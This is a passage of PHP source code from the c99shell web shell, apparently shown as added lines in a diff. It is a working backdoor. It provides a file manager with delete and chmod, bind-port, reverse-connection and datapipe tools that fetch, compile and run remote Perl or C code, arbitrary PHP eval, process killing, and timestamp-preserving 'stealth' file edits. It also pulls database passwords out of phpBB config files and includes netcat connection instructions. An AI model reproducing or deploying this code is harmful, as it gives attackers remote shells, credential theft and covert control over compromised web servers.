src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + //Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." 
folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 0; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 0; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" 
selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "<b>Result of binding port:</b><br>"; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't 
write sources to \"".$srcpath."\"!<br>";}
+ elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+ else
+ {
+ fwrite($fp,$data,strlen($data));
+ fclose($fp);
+ if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+ $v[1] = str_replace("%path",$binpath,$v[1]);
+ $v[1] = str_replace("%port",$bind["port"],$v[1]);
+ $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+ $v[1] = str_replace("//","/",$v[1]);
+ $retbind = myshellexec($v[1]." > /dev/null &");
+ sleep(5);
+ $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+ if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+ else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+ }
+ echo "<br>";
+ }
+ }
+ if (!empty($bcsubmit))
+ {
+ echo "<b>Result of back connection:</b><br>";
+ $v = $bcsrcs[$bc["src"]];
+ if (empty($v)) {echo "Unknown file!<br>";}
+ else
+ {
+ $w = explode(".",$bc["src"]);
+ $ext = $w[count($w)-1];
+ unset($w[count($w)-1]);
+ $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+ $binpath = $tmpdir.join(".",$w).rand(0,999);
+ if ($ext == "pl") {$binpath = $srcpath;}
+ @unlink($srcpath);
+ $fp = fopen($srcpath,"ab+");
+ if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+ elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+ else
+ {
+ fwrite($fp,$data,strlen($data));
+ fclose($fp);
+ if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." 
".$srcpath); @unlink($srcpath);}
+ $v[1] = str_replace("%path",$binpath,$v[1]);
+ $v[1] = str_replace("%host",$bc["host"],$v[1]);
+ $v[1] = str_replace("%port",$bc["port"],$v[1]);
+ $v[1] = str_replace("//","/",$v[1]);
+ $retbind = myshellexec($v[1]." > /dev/null &");
+ echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+ }
+ }
+ }
+ if (!empty($dpsubmit))
+ {
+ echo "<b>Result of datapipe-running:</b><br>";
+ $v = $dpsrcs[$datapipe["src"]];
+ if (empty($v)) {echo "Unknown file!<br>";}
+ elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+ else
+ {
+ $srcpath = $tmpdir.$datapipe["src"];
+ $w = explode(".",$datapipe["src"]);
+ $ext = $w[count($w)-1];
+ unset($w[count($w)-1]);
+ $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+ $binpath = $tmpdir.join(".",$w).rand(0,999);
+ if ($ext == "pl") {$binpath = $srcpath;}
+ @unlink($srcpath);
+ $fp = fopen($srcpath,"ab+");
+ if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+ elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+ else
+ {
+ fwrite($fp,$data,strlen($data));
+ fclose($fp);
+ if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+ list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+ $v[1] = str_replace("%path",$binpath,$v[1]);
+ $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+ $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+ $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+ $v[1] = str_replace("//","/",$v[1]);
+ $retbind = myshellexec($v[1]." > /dev/null &");
+ sleep(5);
+ $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+ if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+ else {echo "Running datapipe... 
ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+ }
+ echo "<br>";
+ }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. 
You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+ if (empty($processes_sort)) {$processes_sort = $sort_default;}
+ $parsesort = parsesort($processes_sort);
+ if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+ $k = $parsesort[0];
+ if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ $ret = htmlspecialchars($ret);
+ if (!$win)
+ {
+ if ($pid)
+ {
+ if (is_null($sig)) {$sig = 9;}
+ echo "Sending signal ".$sig." to #".$pid."... 
"; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img 
src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ if ($k > count($head)) {$k = count($head)-1;}
+ for($i=0;$i<count($head);$i++)
+ {
+ if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+ }
+ $prcs = array();
+ foreach ($stack as $line)
+ {
+ if (!empty($line))
+ {
+ echo "<tr>";
+ $line = explode(" ",$line);
+ $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+ $line[2] = intval(str_replace(" ","",$line[2]))*1024;
+ $prcs[] = $line;
+ echo "</tr>";
+ }
+ }
+ }
+ $head[$k] = "<b>".$head[$k]."</b>".$y;
+ $v = $processes_sort[0];
+ usort($prcs,"tabsort");
+ if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+ $tab = array();
+ $tab[] = $head;
+ $tab = array_merge($tab,$prcs);
+ echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+ foreach($tab as $i=>$k)
+ {
+ echo "<tr>";
+ foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+ echo "</tr>";
+ }
+ echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+ echo "<b>Result of execution this PHP-code</b>:<br>";
+ $tmp = ob_get_contents();
+ $olddir = realpath(".");
+ @chdir($d);
+ if ($tmp)
+ {
+ ob_clean();
+ eval($eval);
+ $ret = ob_get_contents();
+ $ret = convert_cyr_string($ret,"d","w");
+ ob_clean();
+ echo $tmp;
+ if ($eval_txt)
+ {
+ $rows = count(explode("\r\n",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+ }
+ else {echo $ret."<br>";}
+ }
+ else
+ {
+ if ($eval_txt)
+ {
+ echo 
"<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+ }
+ else {echo $ret;}
+ }
+ @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+ if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+ else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+ $r = @file_get_contents($d.$f);
+ $ext = explode(".",$f);
+ $c = count($ext)-1;
+ $ext = $ext[$c];
+ $ext = strtolower($ext);
+ $rft = "";
+ foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+ if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+ if (empty($ft)) {$ft = $rft;}
+ $arr = array(
+ array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+ array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+ array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+ array("Code","code"),
+ array("Session","phpsess"),
+ array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+ array("SDB","sdb"),
+ array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+ array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+ array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+ array("<img 
src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+ array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+ );
+ echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+ foreach($arr as $t)
+ {
+ if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+ elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+ else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+ echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+ }
+ echo "<hr size=\"1\" noshade>";
+ if ($ft == "info")
+ {
+ echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+ if (!$win)
+ {
+ echo "<tr><td><b>Owner/Group</b></td><td> ";
+ $ow = posix_getpwuid(fileowner($d.$f));
+ $gr = posix_getgrgid(filegroup($d.$f));
+ echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+ }
+ echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+ $fi = fopen($d.$f,"rb");
+ if ($fi)
+ {
+ if 
($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a 
href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,true)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a 
href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+ else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+ echo "Parameters for manual connect:<br>";
+ $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+ foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ echo "</b><hr size=\"1\" noshade>";
+ }
+ }
+ echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+ if (!empty($white)) {@ob_clean();}
+ highlight_file($d.$f);
+ if (!empty($white)) {c99shexit();}
+ echo "</div>";
+ }
+ elseif ($ft == "download")
+ {
+ @ob_clean();
+ header("Content-type: application/octet-stream");
+ header("Content-length: ".filesize($d.$f));
+ header("Content-disposition: attachment; filename=\"".$f."\";");
+ echo $r;
+ exit;
+ }
+ elseif ($ft == "notepad")
+ {
+ @ob_clean();
+ header("Content-type: text/plain");
+ header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+ echo($r);
+ exit;
+ }
+ elseif ($ft == "img")
+ {
+ $inf = getimagesize($d.$f);
+ if (!$white)
+ {
+ if (empty($imgsize)) {$imgsize = 20;}
+ $width = $inf[0]/100*$imgsize;
+ $height = $inf[1]/100*$imgsize;
+ echo "<center><b>Size:</b>&nbsp;";
+ $sizes = array("100","50","20");
+ foreach ($sizes as $v)
+ {
+ echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+ if ($imgsize != $v ) {echo $v;}
+ else {echo "<u>".$v."</u>";}
+ echo "</a>&nbsp;&nbsp;&nbsp;";
+ }
+ echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" 
width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> 